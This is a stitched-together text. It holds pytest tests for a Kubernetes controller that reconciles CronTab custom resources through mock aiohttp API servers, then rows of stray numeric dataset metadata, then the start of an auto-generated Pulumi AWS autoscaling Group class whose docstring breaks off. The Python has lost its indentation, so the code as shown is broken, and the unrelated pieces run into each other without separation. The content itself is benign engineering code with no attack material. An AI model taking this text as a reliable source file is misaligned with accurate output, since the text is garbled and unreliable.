# the k8s controller checks if the CronTabs named `cron-demo-1`, `cron-demo-2`
# and `cron-demo-3` already exists.
@routes.get("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
async def _(request):
deployments = ("cron-demo-1", "cron-demo-2", "cron-demo-3")
if request.match_info["name"] in deployments:
return web.Response(status=200)
return web.Response(status=404)
# As part of the reconciliation loop, the k8s controller patch the existing
# CronTab which has been modified.
@routes.patch("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
async def _(request):
rd = await request.read()
app = json.loads(rd)
# Craft a response to be used by the Hooks
resp = deepcopy(crontab_response)
resp["metadata"]["name"] = app["metadata"]["name"]
resp["spec"]["image"] = app["spec"]["image"]
resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]
patched.add(request.match_info["name"])
return web.json_response(resp)
# As part the reconciliation loop, the k8s controller deletes the CronTab which
# are not present in the manifest file anymore.
@routes.delete("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
async def _(request):
deleted.add(request.match_info["name"])
return web.Response(status=200)
kubernetes_app = web.Application()
kubernetes_app.add_routes(routes)
kubernetes_server = await aiohttp_server(kubernetes_app)
cluster = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
status__state=ApplicationState.RUNNING,
status__is_scheduled=True,
status__running_on=resource_ref(cluster),
status__scheduled_to=resource_ref(cluster),
status__last_observed_manifest=[
create_cron_resource("cron-demo-1", minute=5),
create_cron_resource("cron-demo-2", minute=15),
create_cron_resource("cron-demo-3", minute=35),
],
spec__manifest=[
create_cron_resource("cron-demo-2", minute=15),
create_cron_resource("cron-demo-3", minute=35, image="cron-image:1.2"),
],
)
await db.put(cluster)
await db.put(app)
server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(server), loop=loop) as client:
controller = KubernetesController(server_endpoint(server), worker_count=0)
await controller.prepare(client)
# The resource is received by the controller, which starts the reconciliation
# loop, deletes `cron-demo-1` and update `cron-demo-3`, and update the
# applications in the DB accordingly.
await controller.resource_received(app)
assert "cron-demo-1" in deleted
assert "cron-demo-3" in patched
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored.status.last_applied_manifest == app.spec.manifest
# The resource doesn't contain any list (therefore no special control dictionary is
# present in last_observed_manifest), and no custom observer_schema is used
# (therefore all fields present in spec.manifest are observed). In this specific
# case, the last_observed_manifest should be equal to spec.manifest
assert stored.status.last_observed_manifest == app.spec.manifest
assert stored.status.state == ApplicationState.RUNNING
assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_app_custom_resource_migration(aiohttp_server, config, db, loop):
"""Application was scheduled to a different cluster. The controller should
delete objects from the old cluster and create objects on the new cluster.
"""
routes = web.RouteTableDef()
# Determine scope, version, group and plural of custom resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd()),
content_type="application/json",
)
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
# the k8s controller checks if the CronTabs already exists.
@routes.get("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
async def _(request):
return web.Response(status=404)
# As part of the reconciliation, the k8s controller creates a new CronTab on the
# target cluster
@routes.post("/apis/stable.example.com/v1/namespaces/default/crontabs")
async def _(request):
rd = await request.read()
app = json.loads(rd)
# Craft a response to be used by the Hooks
resp = deepcopy(crontab_response)
resp["metadata"]["name"] = app["metadata"]["name"]
resp["spec"]["image"] = app["spec"]["image"]
resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]
request.app["created"].add(app["metadata"]["name"])
return web.json_response(resp)
# As part of the migration, the k8s controller deletes the Deployment on the old
# cluster
@routes.delete("/apis/stable.example.com/v1/namespaces/default/crontabs/{name}")
async def delete_deployment(request):
request.app["deleted"].add(request.match_info["name"])
return web.Response(status=200)
async def make_kubernetes_api(existing=()):
app = web.Application()
app["created"] = set()
app["deleted"] = set()
app.add_routes(routes)
return await aiohttp_server(app)
kubernetes_server_A = await make_kubernetes_api()
kubernetes_server_B = await make_kubernetes_api()
cluster_A = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server_A),
spec__custom_resources=["crontabs.stable.example.com"],
)
cluster_B = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server_B),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
status__state=ApplicationState.RUNNING,
status__is_scheduled=True,
status__running_on=resource_ref(cluster_A),
status__scheduled_to=resource_ref(cluster_B),
status__last_observed_manifest=[create_cron_resource(name="cron1", minute=10)],
spec__manifest=[create_cron_resource(name="cron2")],
)
assert resource_ref(cluster_A) in app.metadata.owners
assert resource_ref(cluster_B) in app.metadata.owners
await db.put(cluster_A)
await db.put(cluster_B)
await db.put(app)
server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(server), loop=loop) as client:
controller = KubernetesController(server_endpoint(server), worker_count=0)
await controller.prepare(client)
# The resource is received by the controller, which starts the reconciliation
# loop, migrate the application and updates the DB accordingly.
await controller.resource_received(app)
assert "cron1" in kubernetes_server_A.app["deleted"]
assert "cron2" in kubernetes_server_B.app["created"]
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored.status.last_applied_manifest == app.spec.manifest
# The resource doesn't contain any list (therefore no special control dictionary is
# present in last_observed_manifest), and no custom observer_schema is used
# (therefore all fields present in spec.manifest are observed). In this specific
# case, the last_observed_manifest should be equal to spec.manifest
assert stored.status.last_observed_manifest == app.spec.manifest
assert stored.status.state == ApplicationState.RUNNING
assert stored.status.running_on == resource_ref(cluster_B)
assert resource_ref(cluster_A) not in stored.metadata.owners
assert resource_ref(cluster_B) in stored.metadata.owners
async def test_app_custom_resource_deletion(aiohttp_server, config, db, loop):
kubernetes_app = web.Application()
routes = web.RouteTableDef()
# Determine scope, version, group and plural of custome resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd()),
content_type="application/json",
)
return web.Response(status=404)
@routes.delete("/apis/stable.example.com/v1/namespaces/default/crontabs/cron")
async def _(request):
return web.Response(status=200)
kubernetes_app.add_routes(routes)
kubernetes_server = await aiohttp_server(kubernetes_app)
cluster = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
metadata__deleted=fake.date_time(tzinfo=pytz.utc),
status__state=ApplicationState.RUNNING,
status__scheduled_to=resource_ref(cluster),
status__running_on=resource_ref(cluster),
metadata__finalizers=["kubernetes_resources_deletion"],
status__last_observed_manifest=[create_cron_resource()],
)
assert resource_ref(cluster) in app.metadata.owners
await db.put(cluster)
await db.put(app)
server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(server), loop=loop) as client:
controller = KubernetesController(server_endpoint(server), worker_count=0)
await controller.prepare(client)
await controller.resource_received(app, start_observer=False)
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored is None
async def test_app_custom_resource_creation_non_ns(aiohttp_server, config, db, loop):
routes = web.RouteTableDef()
# Determine scope, version, group and plural of custom resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd(namespaced=False)),
content_type="application/json",
)
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
# the k8s controller checks if a CronTab named `cron` already exists.
@routes.get("/apis/stable.example.com/v1/crontabs/cron")
async def _(request):
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
# the k8s controller creates the CronTab named `cron`.
@routes.post("/apis/stable.example.com/v1/crontabs")
async def _(request):
return web.json_response(crontab_response)
kubernetes_app = web.Application()
kubernetes_app.add_routes(routes)
kubernetes_server = await aiohttp_server(kubernetes_app)
cluster = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
status__state=ApplicationState.PENDING,
status__scheduled_to=resource_ref(cluster),
status__is_scheduled=False,
spec__manifest=[create_cron_resource()],
)
await db.put(cluster)
await db.put(app)
api_server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(api_server), loop=loop) as client:
controller = KubernetesController(server_endpoint(api_server), worker_count=0)
await controller.prepare(client)
# The resource is received by the controller, which starts the reconciliation
# loop, and updates the application in the DB accordingly.
await controller.resource_received(app)
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored.status.last_applied_manifest == app.spec.manifest
# The resource doesn't contain any list (therefore no special control dictionary is
# present in last_observed_manifest), and no custom observer_schema is used
# (therefore all fields present in spec.manifest are observed). In this specific
# case, the last_observed_manifest should be equal to spec.manifest
assert stored.status.last_observed_manifest == app.spec.manifest
assert stored.status.state == ApplicationState.RUNNING
assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_app_custom_resource_update_non_ns(aiohttp_server, config, db, loop):
"""Test the update of a running application using CRD
The Kubernetes Controller should patch the application and update the DB.
"""
routes = web.RouteTableDef()
deleted = set()
patched = set()
# Determine scope, version, group and plural of custom resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd(namespaced=False)),
content_type="application/json",
)
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
# the k8s controller checks if the CronTabs named `cron-demo-1`, `cron-demo-2`
# and `cron-demo-3` already exists.
@routes.get("/apis/stable.example.com/v1/crontabs/{name}")
async def _(request):
deployments = ("cron-demo-1", "cron-demo-2", "cron-demo-3")
if request.match_info["name"] in deployments:
return web.Response(status=200)
return web.Response(status=404)
# As part of the reconciliation loop, the k8s controller patch the existing
# CronTab which has been modified.
@routes.patch("/apis/stable.example.com/v1/crontabs/{name}")
async def _(request):
rd = await request.read()
app = json.loads(rd)
# Craft a response to be used by the Hooks
resp = deepcopy(crontab_response)
resp["metadata"]["name"] = app["metadata"]["name"]
resp["spec"]["image"] = app["spec"]["image"]
resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]
patched.add(request.match_info["name"])
return web.json_response(resp)
# As part the reconciliation loop, the k8s controller deletes the CronTab which
# are not present in the manifest file anymore.
@routes.delete("/apis/stable.example.com/v1/crontabs/{name}")
async def _(request):
deleted.add(request.match_info["name"])
return web.Response(status=200)
kubernetes_app = web.Application()
kubernetes_app.add_routes(routes)
kubernetes_server = await aiohttp_server(kubernetes_app)
cluster = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
status__state=ApplicationState.RUNNING,
status__is_scheduled=True,
status__running_on=resource_ref(cluster),
status__scheduled_to=resource_ref(cluster),
status__last_observed_manifest=[
create_cron_resource("cron-demo-1", minute=5),
create_cron_resource("cron-demo-2", minute=15),
create_cron_resource("cron-demo-3", minute=35),
],
spec__manifest=[
create_cron_resource("cron-demo-2", minute=15),
create_cron_resource("cron-demo-3", minute=35, image="cron-image:1.2"),
],
)
await db.put(cluster)
await db.put(app)
server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(server), loop=loop) as client:
controller = KubernetesController(server_endpoint(server), worker_count=0)
await controller.prepare(client)
# The resource is received by the controller, which starts the reconciliation
# loop, deletes `cron-demo-1` and update `cron-demo-3`, and update the
# applications in the DB accordingly.
await controller.resource_received(app)
assert "cron-demo-1" in deleted
assert "cron-demo-3" in patched
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored.status.last_applied_manifest == app.spec.manifest
# The resource doesn't contain any list (therefore no special control dictionary is
# present in last_observed_manifest), and no custom observer_schema is used
# (therefore all fields present in spec.manifest are observed). In this specific
# case, the last_observed_manifest should be equal to spec.manifest
assert stored.status.last_observed_manifest == app.spec.manifest
assert stored.status.state == ApplicationState.RUNNING
assert stored.metadata.finalizers[-1] == "kubernetes_resources_deletion"
async def test_app_custom_resource_migration_non_ns(aiohttp_server, config, db, loop):
"""Application was scheduled to a different cluster. The controller should
delete objects from the old cluster and create objects on the new cluster.
"""
routes = web.RouteTableDef()
# Determine scope, version, group and plural of custom resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd(namespaced=False)),
content_type="application/json",
)
return web.Response(status=404)
# As part of the reconciliation loop started by ``controller.resource_received``,
# the k8s controller checks if the CronTabs already exists.
@routes.get("/apis/stable.example.com/v1/crontabs/{name}")
async def _(request):
return web.Response(status=404)
# As part of the reconciliation, the k8s controller creates a new CronTab on the
# target cluster
@routes.post("/apis/stable.example.com/v1/crontabs")
async def _(request):
rd = await request.read()
app = json.loads(rd)
# Craft a response to be used by the Hooks
resp = deepcopy(crontab_response)
resp["metadata"]["name"] = app["metadata"]["name"]
resp["spec"]["image"] = app["spec"]["image"]
resp["spec"]["cron_spec"] = app["spec"]["cronSpec"]
request.app["created"].add(app["metadata"]["name"])
return web.json_response(resp)
# As part of the migration, the k8s controller deletes the Deployment on the old
# cluster
@routes.delete("/apis/stable.example.com/v1/crontabs/{name}")
async def delete_deployment(request):
request.app["deleted"].add(request.match_info["name"])
return web.Response(status=200)
async def make_kubernetes_api(existing=()):
app = web.Application()
app["created"] = set()
app["deleted"] = set()
app.add_routes(routes)
return await aiohttp_server(app)
kubernetes_server_A = await make_kubernetes_api()
kubernetes_server_B = await make_kubernetes_api()
cluster_A = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server_A),
spec__custom_resources=["crontabs.stable.example.com"],
)
cluster_B = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server_B),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
status__state=ApplicationState.RUNNING,
status__is_scheduled=True,
status__running_on=resource_ref(cluster_A),
status__scheduled_to=resource_ref(cluster_B),
status__last_observed_manifest=[create_cron_resource(name="cron1", minute=10)],
spec__manifest=[create_cron_resource(name="cron2")],
)
assert resource_ref(cluster_A) in app.metadata.owners
assert resource_ref(cluster_B) in app.metadata.owners
await db.put(cluster_A)
await db.put(cluster_B)
await db.put(app)
server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(server), loop=loop) as client:
controller = KubernetesController(server_endpoint(server), worker_count=0)
await controller.prepare(client)
# The resource is received by the controller, which starts the reconciliation
# loop, migrate the application and updates the DB accordingly.
await controller.resource_received(app)
assert "cron1" in kubernetes_server_A.app["deleted"]
assert "cron2" in kubernetes_server_B.app["created"]
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored.status.last_applied_manifest == app.spec.manifest
# The resource doesn't contain any list (therefore no special control dictionary is
# present in last_observed_manifest), and no custom observer_schema is used
# (therefore all fields present in spec.manifest are observed). In this specific
# case, the last_observed_manifest should be equal to spec.manifest
assert stored.status.last_observed_manifest == app.spec.manifest
assert stored.status.state == ApplicationState.RUNNING
assert stored.status.running_on == resource_ref(cluster_B)
assert resource_ref(cluster_A) not in stored.metadata.owners
assert resource_ref(cluster_B) in stored.metadata.owners
async def test_app_custom_resource_deletion_non_ns(aiohttp_server, config, db, loop):
kubernetes_app = web.Application()
routes = web.RouteTableDef()
# Determine scope, version, group and plural of custome resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
if request.match_info["name"] == "crontabs.stable.example.com":
return web.Response(
status=200,
body=json.dumps(crontab_crd(namespaced=False)),
content_type="application/json",
)
return web.Response(status=404)
@routes.delete("/apis/stable.example.com/v1/crontabs/cron")
async def _(request):
return web.Response(status=200)
kubernetes_app.add_routes(routes)
kubernetes_server = await aiohttp_server(kubernetes_app)
cluster = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
metadata__deleted=fake.date_time(tzinfo=pytz.utc),
status__state=ApplicationState.RUNNING,
status__scheduled_to=resource_ref(cluster),
status__running_on=resource_ref(cluster),
metadata__finalizers=["kubernetes_resources_deletion"],
status__last_observed_manifest=[create_cron_resource()],
)
assert resource_ref(cluster) in app.metadata.owners
await db.put(cluster)
await db.put(app)
server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(server), loop=loop) as client:
controller = KubernetesController(server_endpoint(server), worker_count=0)
await controller.prepare(client)
await controller.resource_received(app, start_observer=False)
stored = await db.get(
Application, namespace=app.metadata.namespace, name=app.metadata.name
)
assert stored is None
async def test_app_custom_resource_error_handling(aiohttp_server, config, db, loop):
routes = web.RouteTableDef()
# Determine scope, version, group and plural of custom resource definition
@routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
async def _(request):
return web.Response(status=403)
kubernetes_app = web.Application()
kubernetes_app.add_routes(routes)
kubernetes_server = await aiohttp_server(kubernetes_app)
cluster = ClusterFactory(
spec__kubeconfig=make_kubeconfig(kubernetes_server),
spec__custom_resources=["crontabs.stable.example.com"],
)
app = ApplicationFactory(
status__state=ApplicationState.PENDING,
status__scheduled_to=resource_ref(cluster),
status__is_scheduled=False,
spec__manifest=[create_cron_resource()],
)
await db.put(cluster)
await db.put(app)
api_server = await aiohttp_server(create_app(config))
async with Client(url=server_endpoint(api_server), loop=loop) as client:
controller = KubernetesController(server_endpoint(api_server), worker_count=0)
await controller.prepare(client)
with pytest.raises(InvalidCustomResourceDefinitionError, match="403"):
await controller.resource_received(app)
| 39.158746
| 88
| 0.68741
| 4,624
| 38,728
| 5.572448
| 0.058607
| 0.014903
| 0.029185
| 0.034812
| 0.914619
| 0.904917
| 0.901347
| 0.88951
| 0.883688
| 0.88365
| 0
| 0.010824
| 0.215167
| 38,728
| 988
| 89
| 39.198381
| 0.836914
| 0.167527
| 0
| 0.767584
| 0
| 0
| 0.130888
| 0.091334
| 0
| 0
| 0
| 0
| 0.076453
| 1
| 0.001529
| false
| 0
| 0.027523
| 0.001529
| 0.107034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b31435eafac3eb6914b84c1f42bf9353e8e30f9b
| 43,326
|
py
|
Python
|
sdk/python/pulumi_aws/autoscaling/group.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/autoscaling/group.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/autoscaling/group.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Group(pulumi.CustomResource):
arn: pulumi.Output[str]
"""
The ARN for this AutoScaling Group
"""
availability_zones: pulumi.Output[list]
"""
A list of one or more availability zones for the group. This parameter should not be specified when using `vpc_zone_identifier`.
"""
default_cooldown: pulumi.Output[float]
"""
The amount of time, in seconds, after a scaling activity completes before another scaling activity can start.
"""
desired_capacity: pulumi.Output[float]
"""
The number of Amazon EC2 instances that
should be running in the group. (See also Waiting for
Capacity below.)
"""
enabled_metrics: pulumi.Output[list]
"""
A list of metrics to collect. The allowed values are `GroupDesiredCapacity`, `GroupInServiceCapacity`, `GroupPendingCapacity`, `GroupMinSize`, `GroupMaxSize`, `GroupInServiceInstances`, `GroupPendingInstances`, `GroupStandbyInstances`, `GroupStandbyCapacity`, `GroupTerminatingCapacity`, `GroupTerminatingInstances`, `GroupTotalCapacity`, `GroupTotalInstances`.
* `wait_for_capacity_timeout` (Default: "10m") A maximum
[duration](https://golang.org/pkg/time/#ParseDuration) that this provider should
wait for ASG instances to be healthy before timing out. (See also Waiting
for Capacity below.) Setting this to "0" causes
this provider to skip all Capacity Waiting behavior.
"""
force_delete: pulumi.Output[bool]
"""
Allows deleting the autoscaling group without waiting
for all instances in the pool to terminate. You can force an autoscaling group to delete
even if it's in the process of scaling a resource. Normally, this provider
drains all the instances before deleting the group. This bypasses that
behavior and potentially leaves resources dangling.
"""
health_check_grace_period: pulumi.Output[float]
"""
Time (in seconds) after instance comes into service before checking health.
"""
health_check_type: pulumi.Output[str]
"""
"EC2" or "ELB". Controls how health checking is done.
"""
initial_lifecycle_hooks: pulumi.Output[list]
"""
One or more
[Lifecycle Hooks](http://docs.aws.amazon.com/autoscaling/latest/userguide/lifecycle-hooks.html)
to attach to the autoscaling group **before** instances are launched. The
syntax is exactly the same as the separate
[`autoscaling.LifecycleHook`](https://www.terraform.io/docs/providers/aws/r/autoscaling_lifecycle_hook.html)
resource, without the `autoscaling_group_name` attribute. Please note that this will only work when creating
a new autoscaling group. For all other use-cases, please use `autoscaling.LifecycleHook` resource.
* `default_result` (`str`)
* `heartbeat_timeout` (`float`)
* `lifecycle_transition` (`str`)
* `name` (`str`) - The name of the auto scaling group. By default generated by this provider.
* `notification_metadata` (`str`)
* `notification_target_arn` (`str`)
* `role_arn` (`str`)
"""
launch_configuration: pulumi.Output[str]
"""
The name of the launch configuration to use.
"""
launch_template: pulumi.Output[dict]
"""
Nested argument containing launch template settings along with the overrides to specify multiple instance types and weights. Defined below.
* `id` (`str`) - The autoscaling group id.
* `name` (`str`) - The name of the auto scaling group. By default generated by this provider.
* `version` (`str`) - Template version. Can be version number, `$Latest`, or `$Default`. (Default: `$Default`).
"""
load_balancers: pulumi.Output[list]
"""
A list of elastic load balancer names to add to the autoscaling
group names. Only valid for classic load balancers. For ALBs, use `target_group_arns` instead.
"""
max_instance_lifetime: pulumi.Output[float]
"""
The maximum amount of time, in seconds, that an instance can be in service, values must be either equal to 0 or between 604800 and 31536000 seconds.
"""
max_size: pulumi.Output[float]
"""
The maximum size of the auto scale group.
"""
metrics_granularity: pulumi.Output[str]
"""
The granularity to associate with the metrics to collect. The only valid value is `1Minute`. Default is `1Minute`.
"""
min_elb_capacity: pulumi.Output[float]
"""
Setting this causes this provider to wait for
this number of instances from this autoscaling group to show up healthy in the
ELB only on creation. Updates will not wait on ELB instance number changes.
(See also Waiting for Capacity below.)
"""
min_size: pulumi.Output[float]
"""
The minimum size of the auto scale group.
(See also Waiting for Capacity below.)
"""
mixed_instances_policy: pulumi.Output[dict]
"""
Configuration block containing settings to define launch targets for Auto Scaling groups. Defined below.
* `instancesDistribution` (`dict`) - Nested argument containing settings on how to mix on-demand and Spot instances in the Auto Scaling group. Defined below.
* `onDemandAllocationStrategy` (`str`) - Strategy to use when launching on-demand instances. Valid values: `prioritized`. Default: `prioritized`.
* `onDemandBaseCapacity` (`float`) - Absolute minimum amount of desired capacity that must be fulfilled by on-demand instances. Default: `0`.
* `onDemandPercentageAboveBaseCapacity` (`float`) - Percentage split between on-demand and Spot instances above the base on-demand capacity. Default: `100`.
* `spotAllocationStrategy` (`str`) - How to allocate capacity across the Spot pools. Valid values: `lowest-price`, `capacity-optimized`. Default: `lowest-price`.
* `spotInstancePools` (`float`) - Number of Spot pools per availability zone to allocate capacity. EC2 Auto Scaling selects the cheapest Spot pools and evenly allocates Spot capacity across the number of Spot pools that you specify. Default: `2`.
* `spotMaxPrice` (`str`) - Maximum price per unit hour that the user is willing to pay for the Spot instances. Default: an empty string which means the on-demand price.
* `launch_template` (`dict`) - Nested argument containing launch template settings along with the overrides to specify multiple instance types and weights. Defined below.
* `launchTemplateSpecification` (`dict`) - Nested argument defines the Launch Template. Defined below.
* `launchTemplateId` (`str`) - The ID of the launch template. Conflicts with `launch_template_name`.
* `launchTemplateName` (`str`) - The name of the launch template. Conflicts with `launch_template_id`.
* `version` (`str`) - Template version. Can be version number, `$Latest`, or `$Default`. (Default: `$Default`).
* `overrides` (`list`) - List of nested arguments provides the ability to specify multiple instance types. This will override the same parameter in the launch template. For on-demand instances, Auto Scaling considers the order of preference of instance types to launch based on the order specified in the overrides list. Defined below.
* `instanceType` (`str`) - Override the instance type in the Launch Template.
* `weightedCapacity` (`str`) - The number of capacity units, which gives the instance type a proportional weight to other instance types.
"""
name: pulumi.Output[str]
"""
The name of the auto scaling group. By default generated by this provider.
"""
name_prefix: pulumi.Output[str]
"""
Creates a unique name beginning with the specified
prefix. Conflicts with `name`.
"""
placement_group: pulumi.Output[str]
"""
The name of the placement group into which you'll launch your instances, if any.
"""
protect_from_scale_in: pulumi.Output[bool]
"""
Allows setting instance protection. The
autoscaling group will not select instances with this setting for terminination
during scale in events.
"""
service_linked_role_arn: pulumi.Output[str]
"""
The ARN of the service-linked role that the ASG will use to call other AWS services
"""
suspended_processes: pulumi.Output[list]
"""
A list of processes to suspend for the AutoScaling Group. The allowed values are `Launch`, `Terminate`, `HealthCheck`, `ReplaceUnhealthy`, `AZRebalance`, `AlarmNotification`, `ScheduledActions`, `AddToLoadBalancer`.
Note that if you suspend either the `Launch` or `Terminate` process types, it can prevent your autoscaling group from functioning properly.
"""
tags: pulumi.Output[list]
"""
A list of tag blocks. Tags documented below.
* `key` (`str`) - Key
* `propagateAtLaunch` (`bool`) - Enables propagation of the tag to
Amazon EC2 instances launched via this ASG
* `value` (`str`) - Value
"""
tags_collection: pulumi.Output[list]
"""
A list of tag blocks (maps). Tags documented below.
"""
target_group_arns: pulumi.Output[list]
"""
A list of `alb.TargetGroup` ARNs, for use with Application or Network Load Balancing.
"""
termination_policies: pulumi.Output[list]
"""
A list of policies to decide how the instances in the auto scale group should be terminated. The allowed values are `OldestInstance`, `NewestInstance`, `OldestLaunchConfiguration`, `ClosestToNextInstanceHour`, `OldestLaunchTemplate`, `AllocationStrategy`, `Default`.
"""
vpc_zone_identifiers: pulumi.Output[list]
"""
A list of subnet IDs to launch resources in.
"""
wait_for_capacity_timeout: pulumi.Output[str]
wait_for_elb_capacity: pulumi.Output[float]
"""
Setting this will cause this provider to wait
for exactly this number of healthy instances from this autoscaling group in
all attached load balancers on both create and update operations. (Takes
precedence over `min_elb_capacity` behavior.)
(See also Waiting for Capacity below.)
"""
def __init__(__self__, resource_name, opts=None, availability_zones=None, default_cooldown=None, desired_capacity=None, enabled_metrics=None, force_delete=None, health_check_grace_period=None, health_check_type=None, initial_lifecycle_hooks=None, launch_configuration=None, launch_template=None, load_balancers=None, max_instance_lifetime=None, max_size=None, metrics_granularity=None, min_elb_capacity=None, min_size=None, mixed_instances_policy=None, name=None, name_prefix=None, placement_group=None, protect_from_scale_in=None, service_linked_role_arn=None, suspended_processes=None, tags=None, tags_collection=None, target_group_arns=None, termination_policies=None, vpc_zone_identifiers=None, wait_for_capacity_timeout=None, wait_for_elb_capacity=None, __props__=None, __name__=None, __opts__=None):
"""
Provides an AutoScaling Group resource.
> **Note:** You must specify either `launch_configuration`, `launch_template`, or `mixed_instances_policy`.
## Waiting for Capacity
A newly-created ASG is initially empty and begins to scale to `min_size` (or
`desired_capacity`, if specified) by launching instances using the provided
Launch Configuration. These instances take time to launch and boot.
On ASG Update, changes to these values also take time to result in the target
number of instances providing service.
This provider provides two mechanisms to help consistently manage ASG scale up
time across dependent resources.
#### Waiting for ASG Capacity
The first is default behavior. This provider waits after ASG creation for
`min_size` (or `desired_capacity`, if specified) healthy instances to show up
in the ASG before continuing.
If `min_size` or `desired_capacity` are changed in a subsequent update,
this provider will also wait for the correct number of healthy instances before
continuing.
This provider considers an instance "healthy" when the ASG reports `HealthStatus:
"Healthy"` and `LifecycleState: "InService"`. See the [AWS AutoScaling
Docs](https://docs.aws.amazon.com/AutoScaling/latest/DeveloperGuide/AutoScalingGroupLifecycle.html)
for more information on an ASG's lifecycle.
This provider will wait for healthy instances for up to
`wait_for_capacity_timeout`. If ASG creation is taking more than a few minutes,
it's worth investigating for scaling activity errors, which can be caused by
problems with the selected Launch Configuration.
Setting `wait_for_capacity_timeout` to `"0"` disables ASG Capacity waiting.
#### Waiting for ELB Capacity
The second mechanism is optional, and affects ASGs with attached ELBs specified
via the `load_balancers` attribute or with ALBs specified with `target_group_arns`.
The `min_elb_capacity` parameter causes this provider to wait for at least the
requested number of instances to show up `"InService"` in all attached ELBs
during ASG creation. It has no effect on ASG updates.
If `wait_for_elb_capacity` is set, this provider will wait for exactly that number
of Instances to be `"InService"` in all attached ELBs on both creation and
updates.
These parameters can be used to ensure that service is being provided before
this provider moves on. If new instances don't pass the ELB's health checks for any
reason, the deployment will time out, and the ASG will be marked as
tainted (i.e. marked to be destroyed in a follow up run).
As with ASG Capacity, this provider will wait for up to `wait_for_capacity_timeout`
for the proper number of instances to be healthy.
#### Troubleshooting Capacity Waiting Timeouts
If ASG creation takes more than a few minutes, this could indicate one of a
number of configuration problems. See the [AWS Docs on Load Balancer
Troubleshooting](https://docs.aws.amazon.com/ElasticLoadBalancing/latest/DeveloperGuide/elb-troubleshooting.html)
for more information.
